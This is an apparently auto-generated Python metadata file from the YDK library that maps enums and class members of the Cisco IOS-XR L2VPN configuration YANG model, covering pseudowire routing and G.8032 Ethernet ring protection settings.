from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'FlowLabelTlvCodeEnum' : _MetaInfoEnum('FlowLabelTlvCodeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'17':'Y_17',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BackupDisableEnum' : _MetaInfoEnum('BackupDisableEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'never':'never',
'delay':'delay',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetFormatEnum' : _MetaInfoEnum('BgpRouteTargetFormatEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LoadBalanceEnum' : _MetaInfoEnum('LoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'source-dest-mac':'source_dest_mac',
'source-dest-ip':'source_dest_ip',
'pseudowire-label':'pseudowire_label',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterworkingEnum' : _MetaInfoEnum('InterworkingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'ipv4':'ipv4',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PwSwitchingPointTlvEnum' : _MetaInfoEnum('PwSwitchingPointTlvEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'hide':'hide',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacAgingEnum' : _MetaInfoEnum('MacAgingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'absolute':'absolute',
'inactivity':'inactivity',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Tpv3SequencingEnum' : _MetaInfoEnum('L2Tpv3SequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPort1Enum' : _MetaInfoEnum('ErpPort1Enum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port0':'port0',
'port1':'port1',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceProfileEnum' : _MetaInfoEnum('InterfaceProfileEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'snoop':'snoop',
'dhcp-protocol':'dhcp_protocol',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2EncapsulationEnum' : _MetaInfoEnum('L2EncapsulationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan':'vlan',
'ethernet':'ethernet',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceTrafficFloodEnum' : _MetaInfoEnum('InterfaceTrafficFloodEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'traffic-flooding':'traffic_flooding',
'enable-flooding':'enable_flooding',
'disable-flooding':'disable_flooding',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnLoggingEnum' : _MetaInfoEnum('L2VpnLoggingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetRoleEnum' : _MetaInfoEnum('BgpRouteTargetRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'both':'both',
'import':'import_',
'export':'export',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPortEnum' : _MetaInfoEnum('ErpPortEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'virtual':'virtual',
'interface':'interface',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacWithdrawBehaviorEnum' : _MetaInfoEnum('MacWithdrawBehaviorEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'legacy':'legacy',
'optimized':'optimized',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpCookieSizeEnum' : _MetaInfoEnum('L2TpCookieSizeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'zero':'zero',
'four':'four',
'eight':'eight',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'StormControlEnum' : _MetaInfoEnum('StormControlEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'unicast':'unicast',
'multicast':'multicast',
'broadcast':'broadcast',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpSignalingProtocolEnum' : _MetaInfoEnum('L2TpSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'l2tpv3':'l2tpv3',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'RplRoleEnum' : _MetaInfoEnum('RplRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'owner':'owner',
'neighbor':'neighbor',
'next-neighbor':'next_neighbor',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLimitActionEnum' : _MetaInfoEnum('MacLimitActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'flood':'flood',
'no-flood':'no_flood',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TypeOfServiceModeEnum' : _MetaInfoEnum('TypeOfServiceModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'reflect':'reflect',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacNotificationEnum' : _MetaInfoEnum('MacNotificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-notif':'no_notif',
'syslog':'syslog',
'trap':'trap',
'syslog-snmp':'syslog_snmp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnVerificationEnum' : _MetaInfoEnum('L2VpnVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LdpVplsIdEnum' : _MetaInfoEnum('LdpVplsIdEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'two-byte-as':'two_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLearnEnum' : _MetaInfoEnum('MacLearnEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'default-learning':'default_learning',
'enable-learning':'enable_learning',
'disable-learning':'disable_learning',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PortDownFlushEnum' : _MetaInfoEnum('PortDownFlushEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port-down-flush':'port_down_flush',
'enable-port-down-flush':'enable_port_down_flush',
'disable-port-down-flush':'disable_port_down_flush',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnCapabilityModeEnum' : _MetaInfoEnum('L2VpnCapabilityModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'high-mode':'high_mode',
'single-mode':'single_mode',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSignalingProtocolEnum' : _MetaInfoEnum('MplsSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'ldp':'ldp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetEnum' : _MetaInfoEnum('BgpRouteTargetEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-stitching':'no_stitching',
'stitching':'stitching',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ControlWordEnum' : _MetaInfoEnum('ControlWordEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PreferredPathEnum' : _MetaInfoEnum('PreferredPathEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'te-tunnel':'te_tunnel',
'ip-tunnel':'ip_tunnel',
'tp-tunnel':'tp_tunnel',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BridgeDomainTransportModeEnum' : _MetaInfoEnum('BridgeDomainTransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'FlowLabelLoadBalanceEnum' : _MetaInfoEnum('FlowLabelLoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'receive':'receive',
'transmit':'transmit',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteDistinguisherEnum' : _MetaInfoEnum('BgpRouteDistinguisherEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'auto':'auto',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpapsEnum' : _MetaInfoEnum('ErpapsEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'interface':'interface',
'bridge-domain':'bridge_domain',
'xconnect':'xconnect',
'none':'none',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'VccvVerificationEnum' : _MetaInfoEnum('VccvVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'lsp-ping':'lsp_ping',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TransportModeEnum' : _MetaInfoEnum('TransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'vlan':'vlan',
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSequencingEnum' : _MetaInfoEnum('MplsSequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'transmit':'transmit',
'receive':'receive',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacSecureActionEnum' : _MetaInfoEnum('MacSecureActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'restrict':'restrict',
'none':'none',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting.PwRoutingBgp' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing-bgp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting',
False,
[
_MetaInfoClassMember('pw-routing-bgp', REFERENCE_CLASS, 'PwRoutingBgp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp',
[], [],
''' Enable Autodiscovery BGP Pseudowire-routing BGP
''',
'pw_routing_bgp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing-global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire-routing Global ID
''',
'pw_routing_global_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Neighbor',
False,
[
_MetaInfoClassMember('ldp-flap', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable targetted LDP session flap action
''',
'ldp_flap',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port0 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port0 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
False,
[
_MetaInfoClassMember('erp-port0', REFERENCE_LIST, 'ErpPort0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
[], [],
''' Configure ERP main port0
''',
'erp_port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
False,
[
_MetaInfoClassMember('port', REFERENCE_ENUM_CLASS, 'ErpPort1Enum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPort1Enum',
[], [],
''' ERP main port number
''',
'port',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'RplRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'RplRoleEnum',
[], [],
''' RPL role
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'rpl',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
False,
[
_MetaInfoClassMember('aps-channel', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port1 APS channel in the format of
InterfaceName, BDName or XconnectName
''',
'aps_channel',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('aps-type', REFERENCE_ENUM_CLASS, 'ErpapsEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpapsEnum',
[], [],
''' Port1 APS type
''',
'aps_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable automatic protection switching
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('level', ATTRIBUTE, 'int' , None, None,
[('0', '7')], [],
''' Automatic protection switching level
''',
'level',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port0', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port0 APS channel in the format of
InterfaceName
''',
'port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port1', REFERENCE_CLASS, 'Port1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
[], [],
''' APS channel for ERP port1
''',
'port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'aps',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
False,
[
_MetaInfoClassMember('erp-instance-id', ATTRIBUTE, 'int' , None, None,
[('1', '2')], [],
''' ERP instance number
''',
'erp_instance_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('aps', REFERENCE_CLASS, 'Aps' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
[], [],
''' Automatic protection switching
''',
'aps',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('description', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance
description
''',
'description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('inclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Associates a set of VLAN IDs with the G
.8032 instance
''',
'inclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance profile
''',
'profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('rpl', REFERENCE_CLASS, 'Rpl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
[], [],
''' Ring protection link
''',
'rpl',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
False,
[
_MetaInfoClassMember('erp-instance', REFERENCE_LIST, 'ErpInstance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
[], [],
''' Ethernet ring protection instance
''',
'erp_instance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instances',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
False,
[
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'none',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port1 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'virtual-or-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
False,
[
_MetaInfoClassMember('erp-port-type', REFERENCE_ENUM_CLASS, 'ErpPortEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPortEnum',
[], [],
''' Port1 type
''',
'erp_port_type',
'Cisco-IOS-XR-l2vpn-cfg', True),
